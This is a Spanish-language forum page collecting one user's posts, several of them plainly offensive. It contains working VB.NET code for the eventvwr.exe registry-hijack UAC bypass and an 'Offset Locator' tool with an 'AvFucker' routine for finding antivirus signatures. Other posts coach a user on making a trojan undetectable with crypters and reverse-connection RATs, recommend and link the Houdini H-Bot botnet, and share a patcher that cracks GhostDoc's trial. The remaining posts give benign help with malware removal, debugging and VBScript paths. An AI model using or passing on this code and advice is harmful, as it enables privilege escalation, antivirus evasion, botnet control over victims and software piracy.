Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - fudmario

Páginas 1 ... 4 5 6 7 8 ... 10
#101
C# - VB.NET / [VB.NET] Bypass UAC
Noviembre 04, 2016, 12:59:52 AM
Código: vbnet

Public Sub Bypass_UAC(ByVal filepath As String)
            'Based: https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
            Using regkey As RegistryKey = Registry.CurrentUser.CreateSubKey("Software\Classes\mscfile\shell\open\command")
                regkey.SetValue("", filepath, RegistryValueKind.String)
            End Using
            Process.Start("eventvwr.exe")
        End Sub



Update:
Change : OpenSubKey ---> CreateSubKey
#102
Dudas y pedidos generales / Re:[Pregunta] Sobre encontrar un patrón que se repite muchas veces en un archivo
Octubre 26, 2016, 01:15:41 PM
Hola,

Como no indicas el lenguaje en que quieres desarrollar el algoritmo, te voy  a mostrar un articulo que encontré y que muestra las formas más rápidas de comprobar si una cadena está contenida dentro de otra cadena y ademas hace la comparativa en tiempo de ejecución de los diferentes métodos.


  • You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
  • You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
  • Y más....You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login







Saludos.
#103
C# - VB.NET / [VB.Net] Offset Locator Function's by fudmario
Octubre 23, 2016, 02:34:13 AM

Aquí les dejos del Baul de los recuerdos, lo he actualizado un poco de la version anterior, algunas funciones para armar vuestro Offset Locator, el code esta un poco sucio, pero se puede mejorar...xD
FUNCIONES:

  • AvFucker
  • Dsplit
  • 256 Combinaciones
  • Offset Replace

Ejemplos de Uso:
Código: vbnet

        ' Call Method AvFucker
        OffsetLocator.Methods.AvFucker(filePath := "D:\test.exe",dirpath := "D:\AvFucker", _
                                       offsetStart := 1000, offsetEnd := 63488, _
                                       blockbyte := 100, valueData := "4D")

        'Call Method Dsplit
        OffsetLocator.Methods.DSplit(filepath := "D:\test.exe", dirpath := "D:\dsplit", _
                                     offsetStart := 1000, offsetEnd := 63488, blockBytes := 1000)

        'Call Method 256 Combination
        OffsetLocator.Methods.C256Combination(filepath := "D:\test.exe",dirpath := "D:\combination",offset := 3400)

        'Call Method OffsetReplace
        OffsetLocator.Methods.OffsetReplace(filepath := "D:\test.exe", fileOutput := "D:\test_replace_90.exe", _
                                            offset := 4500, valueData := "90")



Class file = "Methods.vb"

Código: vbnet

' ***********************************************************************
' Assembly         : Demo Offset Locator 
' Author           : fudmario
'
' Last Modified By : fudmario
' Last Modified On : 10-23-2016
' ***********************************************************************
' <copyright file="Methods.vb" company="DeveloperTeam">
'     Copyright ©  2016
' </copyright>
' <summary></summary>
' ***********************************************************************

Imports System.Threading.Tasks
Imports System.IO
Namespace OffsetLocator
    Public NotInheritable Class Methods
        Private Const FormatName As String = "{0}_{1}{2}"
        Public Shared Sub AvFucker(ByVal filePath As String, ByVal dirpath As String, _
                                   ByVal offsetStart As Integer, ByVal offsetEnd As Integer, _
                                   ByVal blockbyte As Integer, ByVal valueData As String)
            Dim fileOutput As String
            Dim ext as String = Path.GetExtension(filepath)
            Dim value As Integer = Convert.ToInt32(value:=valueData, fromBase:=16)
            Dim byteArray As Byte() = Internal_GenBlockBytes(CByte(value), blockbyte)
            Dim res As List(Of Tuple(Of Integer, Integer)) = Internal_StepGenList(offsetStart, offsetEnd, blockbyte)
            Parallel.ForEach(res, Sub(m)
                                      fileOutput = Path.Combine(dirpath, String.Format(FormatName, m.Item1, blockbyte, ext))
                                      If m.Item2 <> 0 Then byteArray = Internal_GenBlockBytes(CByte(value), m.Item2)
                                      Internal_OffsetReplaceB(filePath, fileOutput, m.Item1, byteArray)
                                  End Sub)
        End Sub
        Private Shared Sub Internal_OffsetReplaceB(ByVal filepath As String, ByVal fileOutput As String, Byval offset As Integer, ByVal blockByte As Byte())
            Using fs As New FileStream(path:=filepath, mode:=FileMode.Open, access:=FileAccess.Read)
                Using fs2 As New FileStream(path:=fileOutput, mode:=FileMode.Create, access:=FileAccess.Write)
                    fs.CopyTo(fs2)
                    fs2.Position = offset
                    fs2.Write(blockByte, 0, blockByte.Length)
                End Using
            End Using
        End Sub

        Public Shared Sub DSplit(ByVal filepath As String, ByVal dirpath As String, ByVal offsetStart As Integer, Byval offsetEnd As Integer,
                          ByVal blockBytes As Integer)
            Dim c As New FileInfo(filepath)
            Dim res As List(Of Tuple(Of Integer, Integer)) = Internal_StepGenList(offsetStart, offsetEnd, blockBytes)

            Parallel.ForEach(res, Sub(m)
                                      Dim output As String = Path.Combine(dirpath, String.Format(FormatName, m.item1, blockBytes, c.Extension))
                                      CreateFileWithBytes(filepath:=filepath, fileoutput:=output, length:=m.item1)
                                      If m.Item2 > 0 Then
                                          CreateFileWithBytes(filepath, Path.Combine(dirpath, String.Format(FormatName, offsetEnd, m.Item2, c.Extension)), offsetEnd)
                                      End If
                                  End Sub)

        End Sub

        Private Shared Sub CreateFileWithBytes(filepath As String, fileoutput As String, length As Integer)
            Dim buffer As Byte() = New Byte(length - 1) {}
            Using fs as New FileStream(path:=filepath, mode:=FileMode.Open, access:=FileAccess.Read)
                fs.Seek(0, SeekOrigin.Begin)
                fs.Read(buffer, 0, buffer.Length)
            End Using
            File.WriteAllBytes(fileoutput, buffer)
        End Sub
        Public Shared Sub OffsetReplace(ByVal filepath As String, ByVal fileOutput As String, ByVal offset As Integer, Byval valueData As String)
                Dim value As Integer = Convert.ToInt32(value:= valueData, fromBase:= 16)
            Internal_OffsetReplaceA(filepath, fileOutput, offset, value)
        End Sub
        Private Shared Sub Internal_OffsetReplaceA(ByVal filepath As String, ByVal fileOutput As String, _
                                                   ByVal offset As Integer, Byval value As Integer)
            Using fs As New FileStream(path:=filepath, mode:=FileMode.Open, access:=FileAccess.Read)
                Using fs2 As New FileStream(path:=fileOutput, mode:=FileMode.Create, access:=FileAccess.Write)
                    fs.CopyTo(fs2)
                    fs2.Position = offset
                    fs2.WriteByte(value:=CByte(value))
                End Using
            End Using
        End Sub
        Public Shared Sub C256Combination(ByVal filepath As String, ByVal dirpath As String, ByVal offset As Integer)
            Dim ext As String = Path.GetExtension(filepath)
            Dim value As String
            Dim output As String
            Parallel.For(0, 255, Sub(i)
                                     value = Convert.ToString(value:=i, toBase:=16).ToUpper
                                     If value.Length = 1 Then value = String.Format("0{0}", value)
                                     output = Path.Combine(dirpath, String.Format(FormatName, offset, value, ext))
                                     Internal_OffsetReplaceA(filepath, output, offset, i)
                                 End Sub)


        End Sub


        Private Shared Function Internal_GenBlockBytes(ByVal value As Byte, ByVal length As Integer) As Byte()
            Return ParallelEnumerable.Repeat(element:=value, count:=length).ToArray()
        End Function
        Private Shared Function Internal_StepGenList(ByVal startIndex As Integer, ByVal endIndex As Integer, ByVal stepSize As Integer) As List(Of Tuple(Of Integer, Integer))
            Dim c As New List(Of Tuple(Of Integer, Integer))
            For i = startIndex to endIndex Step stepSize
                Dim k As Integer = endIndex - i
                If k < stepSize Then
                   ' If k = 0 Then k = 1
                    c.Add(New Tuple(Of Integer, Integer)(item1 := i, item2 := k))
                Else
                    c.Add(New Tuple(Of Integer, Integer)(item1 := i, item2 := 0))
                End If
            Next
            return c
        End Function
    End Class
End NameSpace


#104
Dudas y pedidos generales / Re:Link de bootnet houdini
Octubre 12, 2016, 09:06:35 PM
Hola forero ;D ;D ;D ;D

si mal no recuerdo fui yo el que respondí en ese post...xD

Aqui te lo dejo.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Saludos,...


PD: forero suena a taringuero.... ;D ;D ;D ;D
#105
Dudas y pedidos generales / Re:Hacer patch.exe indetectable
Octubre 07, 2016, 02:35:08 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
..........Como no puedo abrir puertos, fudmario me aconsejo usar un bot. Pero de donde puedo descargar el H-Bot de Houdini? Y que es lo que hace?
Lo unico que encontre en internet fue esto: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Gracias y saludos


En realidad ese es el H-Worm, H-Bot o HoudiniBOT es un simple bot que te permite enviar comandos vbs. Desarrollado para los que sufren abrir puerto,...xD
Consta de un panel web desarrollado en el framework CodeIgniter, que se encarga de solo procesar los comandos y enviarlos a las diferentes bots, no dispone de ninguna interfaz grafica, a diferencia de otras botnets. Solo dispone de un builder(loader) o como quieras llamarlo en donde te permite generar el bot, ver los bot conectados y enviar los comandos, esta escrito en vbscript(si es detectado agarras un bloc de notas y lo modificas un poco y queda facilmente indetectable).



Ya que no lo vi en la base de datos del foro, si quieres descargarlo aqui te lo dejo : You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
#106
Dudas y pedidos generales / Re:Hacer patch.exe indetectable
Octubre 05, 2016, 05:55:23 PM
 
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Hola fudmario,

Si bien NetBus es muy antiguo a mi me sirvió. Pero creo que no es de conexión directa ya que tiene un servidor y un cliente.  Y cuando lo probé no tuve que abrir los puertos.

Con respecto a los troyanos de conexión inversa...
Hay que abrir puertos? De ser así no me sirviria porque tengo ipv6. Y si bien también se puedo abrir puertos en ipv6 no creo que el troyano lo soporte. Yo navego con ipv6 e ipv6 pero mi servicio de Internet solo admite abrir puertos en ipv6 aparte de no tener NAT.

Finalmente tendría una última duda: si yo en encripto un troyano... de que me sirve si la víctima no lo puede abrir por estar encriptado? O hay una cosa que no entendí?

Gracias y saludos

Bueno no soy muy experto, pero te lo explicaré de forma que se pueda entender.
Todos los troyanos(tanto de conexion directa como de conexion inversa) estan formados por Un Cliente y un Servidor.
Si no tuviste que abrir los puertos al ejecutar seguramente lo probaste en loopback|localhost(prueba en dos maquinas distintas y que esten conectadas a internet y me cuentas..xD).

Para ambos tipos de conexiones(directa/inversa) es necesario abrir los puertos.
La diferencia es que:
En Conexion Inversa(***):

  • Solo debes abrir el puerto donde se Ejecuta el Servidor(Donde estan las funciones para controlar un equipo remoto, desde aqui puedes decir al Cliente que realice varias cosas,por ejemplo tu envias al Cliente una Accion(Recuperar Contraseñas guardas,...etc.)).
  • El cliente no necesita abrir los puertos y este lo colocas en la(s) maquina(s) que quieras controlar.



En Conexion Directa:

  • El servidor lo colocas en la(s) maquina(s) que quieras controlar y tambien necesitas abrir los puertos en la(s) maquina(s) que vas a controlar.
  • El Cliente(Es donde estan las funciones para controlar el equipo remoto, desde aqui puedes indicarle al servidor que realice diferentes acciones por ejemplo tu envias al Servidor una Accion(Abrir el Lector de Discos,...etc.)) y el cliente no necesitas abrir los puerto.
      
(***) En los Troyanos de Conexion Inversa, al Cliente le suelen denominar Servidor(o Server), aqui talves haya alguna confusion.
            
Y Finalmente Respecto a cuando encriptas el archivo o Cifras el Archivo, el Crypter se encarga de cifrar el malware y posteriormente se encarga de decifrarlo en memoria y depende del tipo de Crypter lo ejecuta en memoria o lo dropea en disco y lo ejecuta.

Bueno y si tienes miedo a lio de abrir puertos, siempre existen diferentes opciones, la mas sencilla usar alguna bot,... el H-Bot de Houdini es bastante sencilla y no tiene muchas funciones, pero se puede hacer varias cosas y ademas es facilmente modificable....xD


Saludos



#107
Dudas y pedidos generales / Re:Hacer patch.exe indetectable
Octubre 05, 2016, 01:21:56 PM
Hola,
La primera regla cuando realizas modificación de malware es no usar VirusTotal, esto arruina todo el trabajo que estés realizando tratando de dejar indetectable tu malware.
Como te comentaron mas arriba, en el foro dispones de material necesario para poder modificar un malware y dejarlo completamente indetectable(bueno casi indetectable).

Aquí: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Otra cosa,  NetBus es muy, muy, muy antiguo y si mal no recuerdo es de conexion directa, y el primer problema que tendrás es que, en la maquina que coloques el malware necesitara tener el puerto que especifiques este abierto para que te puedas conectar a esa maquina.

Lo mas recomendable es usar un Troyano de Conexion Inversa.
Afortunadamente el foro dispone de una colección amplia, donde puedes elegir:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Personalmente te recomendaría no usar troyanos rippeado o antiguos, ya que son fácilmente detectables en memoria(ya que los antivirus los conocen de pies a cabeza..xD).

Saludos.




#108
Dudas y pedidos generales / Re:Analisis de Bot client Ares ejemplo Source
Septiembre 26, 2016, 12:23:17 AM
Hola, se que esto talvez suene un poco molestoso, pero programar no es adivinar y poner cualquier cosa en cualquier rutina de código (es mejor que sigas aprendiendo de los cursos que (creo) estabas leyendo en: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login



Lo primero es que entre las preguntas que pusiste; sobre el método "You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login" , tranquilamente podrias haberlo resuelto si hubiese buscado en la MSDN, incluso ahi mismo dispones de ejemplos de uso y/o aplicación.



En otra modificación que hiciste, en esta linea:
Código: csharp

  Socket.Send(File.Move(sourceFile, destinationFile));



You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Pero porque me larga el error "canot convert from "void" to "byte[]"?
Si sourceFile y destinationFile no son de tipo byte.
Gracias y saludos

Tan solo con leer el error que genera te hubieses dado de cuenta de que se trata.

  • You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login => Se encarga de mover un archivo  de un lugar a otro, este metodo no devuelve ningun valor,
  • You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login para el parametro buffer solo acepta Una Matriz de tipo Byte que contiene los datos que se enviarán.

Tu estas intentando Establecer en el Parametro Buffer Agregarle un metodo/subrutina que no devuelve ningun valor, pero You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login necesita que pases una matriz de tipo byte en el parametro.



y ni de que hablar del horror que hiciste en esta otra modificacion.
Código: csharp

 buffer.AddRange(FileInfo[] subFiles = di.GetFiles("*ejecutable que quiero enviar*");




Espero que no te lo tomes a mal, pero si quieres aprender a programar tienes que leer, leer y re-leer....
Tienes que investigar por ti mismo y practicar desarrollando proyectos sencillos, para que comprendas como funciona...


Saludos...


#109
C# - VB.NET / Re:GhostDoc Pro - Build 5.2.16200 | Patcher by fudmario
Septiembre 19, 2016, 02:17:00 AM
Una pequeña actualizacion, ahora tambien para la version Enterprise, ademas incluye el Código Fuente.



Descargar Compilado: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Descarg Código Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


Misma pass que en el post inicial.


PD: Cualquier Bug, por MP o SKYPE....

#110
C# - VB.NET / GhostDoc Enterprise - Build 5.2.16200 | Patcher by fudmario
Septiembre 17, 2016, 07:53:51 PM
Aquí les dejo este parche que permite extender el tiempo de uso en Version TRIAL, a diferencia de la version anterior que publique(You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login), en esta version se ha eliminado la marca de Agua.


Ademas viene con una Interfaz de usuario que  automiza todo el proceso de parcheo, tambien tiene la opcion de realizarlo manualmente seleccionando la ruta de instalacion de visual Studio(ej: X:\Program Files (x86)\Microsoft Visual Studio 12.0\Common7\IDE\).


Requerimientos:

  • Ejecutar Como Administrador.
  • .NET Framework 4

Descarga: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Contraseña: byfudmario
Comprimido:  WinRAR5

Para los Desconfiados(detectado por packer SmartAssambly):


Aqui el ChangeLog de Ghost Doc  Build 5.2.16200:(más info You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login)
Código: text


    Added: Support for Visual Studio 2015 Update 3
    Fixed: Now correctly loading the latest ASP.NET Core projects
    Added: GhostDoc now treats underscore as a delimiter to improve summary generation for underscore delimited identifiers
    Added: "Use Modern URLs" Help Configuration option for declarative help documentation file naming - namespace-classname-membername.htm
    Added: Option to turn on/off Documentation Hints during setup
    Added: (Pro) (Ent)Comment Preview is now rendered using the FlatGray theme
    Changed: No longer creating the solution settings .ghostdoc.xml file if none of the default settings have been changed for the solution
    Fixed: Issue when using the /// and ''' shortcuts at the end of file
    Fixed: Issue when renaming a project within the Solution Folder
    Fixed: (Ent) Incorrect cref linking when building help documentation from command line
    Fixed: Exception text is now rendered correctly when the exception argument is a string interpolated string
    Fixed: Issue using with Global namespace in VB.NET
    Fixed: Custom property rules not working
    Fixed: Help Configuration not saved when cancel out of the Build Help File
    Fixed: Issue with Command Line utility failing when the output folder does not exist. The folder is now created when generating the help docs
    Fixed: Problem with GhostDoc incorrectly identifying user path as a network location
    Fixed: Help Configuration issue when Output Path points at a network location
    Fixed: CSHTML files are no longer included as the Documentation Maintenance supported source file type
    Changed: Renamed Browse button to Change in GhostDoc Options -> General -> User folder path
    Fixed: Issue when handling expression body methods

   

Para los que no conozcan sobre el Ghost Doc:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Logines una extensión para Visual Studio que genera comentarios de documentación XML automáticamente para métodos y propiedades, basándose en su tipo, parámetros, nombre y otra información contextual.


IDEs Soportados:

  • Visual Studio 2015(incl. Community Edition)
  • Visual Studio 2013
  • Visual Studio 2012
  • Visual Studio 2010
  • Visual Studio 2008

Lenguajes Soportados:

  • C#
  • Visual Basic
  • C++/CLI
  • JavaScript
#111
Dudas y pedidos generales / Re:Busco archivos Javascript con código malicioso
Septiembre 14, 2016, 02:22:07 PM
Hola, existen web donde almacenan muestras de malware, te paso algunas para ver si encuentras lo que buscas:

  • You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login -> Requiere Contraseña para las muestras, puedes enviarle un correo
  • You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login [Necesario Registrarse]
  • You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login [Necesario Registrarse]
  • You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login [Necesario Registrarse]
  • You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login [Necesario Registrarse]
  • You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login [Necesario Registrarse]
  • You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
  • You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login aka Malware DB
  • You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
  • You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
  • You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
  • You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
#112
Dudas y pedidos generales / Re:Ante una infección ¿Desinfectar o formatear?
Septiembre 14, 2016, 02:08:08 PM
Hola, respecto a tus dudas...
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
......
Muchos ante una infección, prefieren formatear completo e instalar todo de nuevo, ¿pero qué ocurre si me llega un cliente y quiere que mantenga sus datos?
Podrías crear un copia de Respaldo, para poder restaurarlo, luego formatear y volver a restablecerlo....

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
...., ¿Puede ser garantizado la eliminación de dicho virus guiándose básicamente por lo siguiente?

* Conexiones de red activas.
* Procesos en ejecución.
* Control de claves (que infectan frecuentemente) en el registro.
* Análisis con al menos dos antivirus.
* Historial de accesos a archivos.
......

Puede que sea suficiente en ocaciones, sin embargo no es una manera 100% segura.
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
* Conexiones de red activas.
El malware  no necesariamente debe conectarse a internet, recuerda que existe diferente variante de software maliciosos y no solo viene a robar información, sino pueden estar destinadas a dañar a tu equipo.
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
* Procesos en ejecución.
Existen técnicas para ocultar procesos,..

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
* Control de claves (que infectan frecuentemente) en el registro.

No necesariamente se necesita del Regedit, para iniciar app's, existen varias formas: mediante TASKS, mediante Shell:Startup o shell:Common Startup...

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
* Análisis con al menos dos antivirus.
Existe la posibilidad de que el malware en cuestión aun no haya sido detectado por los antivirus, razón por la cual no llegase a ser detectado.

Si no quieres formatear, lo mas recomendable es Analizar el equipo, no solo con antivirus, sino con diversos software de seguridad que te permitan estar seguro de que no haya rastro.

Saludos.
#113
Dudas y pedidos generales / Re:Cómo reparar Windows sin formatear
Septiembre 13, 2016, 02:21:47 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Mucha gente me ha dicho que ccleaner que estropea más que arregla, y no es gente joven si no experimentada.
Si afirmas esto que dicen "gente experimentada" sobre CCleaner, OJO, OJO al usar OTL, HJT, OTM, Combofix...etc.

Ya que el uso inapropiado de estas herramientas pueden causar la perdida de información, puede impedir el funcionamiento normal del sistema, o causar que tu sistema no arranque(en el peor de los casos).

Estas herramientas son usadas como herramientas de diagnósticos que por lo general requiere supervisación/asistencia de un experto para la eliminación de programas maliciosos.

Sin embargo si quieres aprender a utilizar estas herramientas, hay una infinidad de tutoriales para aprender a utilizarlos:

[EN]
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

[ES]
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

[ES]
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


Sobre CCleaner,Argente  Registry Cleaner,Glary Utilities, son herramientas con las que te permiten la automatización de limpieza y optimizacion de tu Computador y son totalmente configurables, si tienes miedo de que arruine tu Equipo, también en cada paso te permite elegir si deseas aplicar la corrección o no, también te ofrece la opción realizar un Backup.

Y si no entiendes el funcionamiento de alguna de las herramientas, buscando podrás encontrar un manual de uso.

Saludos.
#114
Dudas y pedidos generales / Re:Software para fallos o errores windows
Septiembre 12, 2016, 01:50:08 PM
    Hola, para poder ayudarte de mejor forma, deberías dar mas detalles, por ejemplo a que versión de windows  quieres realizar un análisis para detectar errores??.

    En Windows, puedes usar las propias herramientas que vienen incluidos en el sistema(Win7+):

    • Diagnóstico de memoria de Windows


  • Monitor de rendimiento y recursos
  • Generar un informe del mantenimiento del sistema



Si se identifica algún problema, te hará recomendaciones y ofrecerá posibles soluciones.


Aquí  puedes encontrar mas información sobre como realizarlo:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Saludos...[/list]
#115
Dudas y pedidos generales / Re:C# - Recursividad: Problemas donde conviene aplicar la recursividad
Septiembre 05, 2016, 02:10:58 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
......
Y con respecto a Visual Studio, la definición es explicada como si te hablará un científico de Wikipedia.
Sobre lo que dices sobre Visual Studio, es verdad que en un principio no se entiende mucho de lo que dice, pero es cuestión de tiempo para comenzar a comprender...

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Bueno Hu3c0,
En la primera vuelta de la estructura repetitiva for de la columna se reserva espacio de 30x30. Pero en la segunda vuelta en la fila 1 columna 2 sucede lo mismo. No es cierto? Entendí algo mal?

Si, ya que cada vez que recorre el for, inicializas una nueva instancia de la estructura You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login con las dimensiones
de ancho y alto de 30x30. 

Sugerencia y/o Recomendación:
Como te dije en mi comentario, no se que IDE usas.
Pero desde Visual Studio, puedes depurar el código paso a paso, linea por linea, para poder entender que es lo que esta haciendo(como por ejemplo: ver que es lo que pasa en ese for, que pasa en cada recorrido, la asignacion de valores en las variables,...).





Existe un sin de tutoriales para aprender la Depuracion de Codigo paso a paso, con el cual podrás entender que es lo que pasa durante la ejecucion del codigo. De esta forma evitarias esperar a que alguien te responda dudas que tú mismo podrias responderte y ademas con la cual podrás acelerar tú aprendizaje.
Aquí algunos enlaces de referencia que te podrian servir:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


Saludos,.
#116
Dudas y pedidos generales / Re:C# - Recursividad: Problemas donde conviene aplicar la recursividad
Septiembre 03, 2016, 01:40:37 AM
Pero sabes que es lo mas increible?, que con solo un comentario(que según mi opinion no fue ni ofensiva ni destructiva) tengas esa actitud derrotista.

No se que IDE usas, pero personalmente te recomendaria usar Visual Studio, es uno de los mejores IDE's y más completos y con la cual te facilitará aprender programación y ademas de la gran cantidad de complementos que facilita programar, lo poco que aprendí en programación lo hice con Visual Studio.

Y tan solo acercandote con el mouse puedes obtener descripción de Propiedades, Métodos,...





Recuerda que cuanto más aprendas, más te daras cuenta de lo poco que sabes....ya que el camino de la programación es Inmensa

Saludos.


#117
Dudas y pedidos generales / Re:Lenguaje de programación para desarrollar aplicaciones para Android.
Septiembre 02, 2016, 01:59:30 AM
Tambien se puede programar en C#  desde Visual Studio Instalando Xamarin. Puede crear aplicaciones para dispositivos Android, iOS y Windows...más info You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login.

Tambien tengo entendido que RAD Studio XE5 y Delphi incluye soporte para compilar proyectos para Android...


Saludos
#118
Dudas y pedidos generales / Re:Ocupar la memoria RAM de procesos inutiles
Septiembre 02, 2016, 01:48:12 AM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Lo siento pero la programación no es lo mío, yo me hago un lio.

set objshell = createobject("wscript.shell") 
        'De esta Forma:
......
        You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login """" & "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" & """", vbhide
......
        You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login chr(34) & "C: \ Archivos de programa \ WinRAR.exe" & chr(34), vbhide
set objshell = Nothing

Pues ponle un poco de ganas, no es que estes programando algo complicado(es más solo es copiar y pegar) y ademas en mi segundo comentario te mostré cómo puedes agregarlo, puedes usar cualquiera de las tres formas que te mostre en los ejemplos anteriores.

Código: vb

set objshell = createobject("wscript.shell")  
       objshell.run chr(34) & "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" & chr(34), vbhide
       objshell.run chr(34) & "C:\Program Files\WinRAR\WinRAR.exe" & chr(34), vbhide
       '... y asi de la misma forma con todas las rutas de las aplicaciones.....
set objshell = Nothing



PERO OJO: Esta es la segunda ves que te digo. Tienes que revisar las rutas si estan correctas, ya que viendo algunas que pusiste no creo que sean las correctas....como por ejemplo de "WinRAR"
Tu estableces la  Ruta:

Código: vb
objshell.run chr(34) & "C: \ Archivos de programa \ WinRAR.exe" & chr(34), vbhide

Sin embargo la ruta correcta es:

Código: vb
objshell.run chr(34) & "C:\Program Files\WinRAR\WinRAR.exe" & chr(34), vbhide


#119
Dudas y pedidos generales / Re:Ocupar la memoria RAM de procesos inutiles
Septiembre 01, 2016, 01:32:41 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Pues ahora no veo espacios y sigue igual la cosa

set objshell = createobject("wscript.shell")
....
objshell.run "C:\ProgramFiles(x86)\VideoLAN\VLC.exe",vbhide
objshell.run "C:\ProgramFiles(x86)\WindowsMediaPlayer.exe",vbhide
....
...

se que en ocaciones no suelo explicar bien, pero creí que con los ejemplos que puse te quedaria claro....
cuando hablaba de los espacios en las rutas me referia a que si la ruta tiene espacios tienes que entrecomillarlas

Por ejemplo, si quieres ejecutar una archivo que esta en la ruta: C:\MiCarpeta\app.exe
Simplemente podrias hacerlo de esta forma:

Código: vb

set objshell = createobject("wscript.shell")  
objshell.run "C:\MiCarpeta\app.exe", vbhide
set objshell = Nothing


Pero si la Ruta contiene espacios, no puedes quitarle los espacios, ya que estarias estableciendo otra ruta, para tal caso debes entrecomillar las rutas, ej:


Código: vb

set objshell = createobject("wscript.shell")  
	'De esta Forma:
	objshell.run """C:\Program Files (x86)\Windows Media Player\wmplayer.exe""", vbhide
	' o tambien de esta otra forma
	objshell.run """" & "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" & """", vbhide
	'o asi:
	objshell.run chr(34) & "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" & chr(34), vbhide
set objshell = Nothing


otra cosa que vi es que debes comprobar las rutas, ya que para el windows media player tu estableces esta ruta:
Código: text

C:\ProgramFiles(x86)\WindowsMediaPlayer.exe

Sin embargo es esta:
Código: text

"C:\Program Files (x86)\Windows Media Player\wmplayer.exe"




Saludos.....
#120
Dudas y pedidos generales / Re:Ocupar la memoria RAM de procesos inutiles
Agosto 31, 2016, 10:03:48 PM
cuando comentaba sobre los espacios en las rutas, me referia a las que existen, ej:
Ruta con espacio:

Código: text
x:\Ruta con espacio\mi app.exe


Ruta sin espacio:

Código: text
x:\RutaSinEspacio\MiApp.exe


Revisa el ejemplo que te mostre, puedes probar de esta forma:


Código: vb

objshell.run chr(34) & "C:\Program Files (x86)\DVBViewer.exe" & chr(34), vbhide
objshell.run chr(34) & "C:\Program Files (x86)\GlassWire.exe" & chr(34), vbhide
objshell.run chr(34) & "C:\Program Files (x86)\Google\Chrome.exe" & chr(34), vbhide
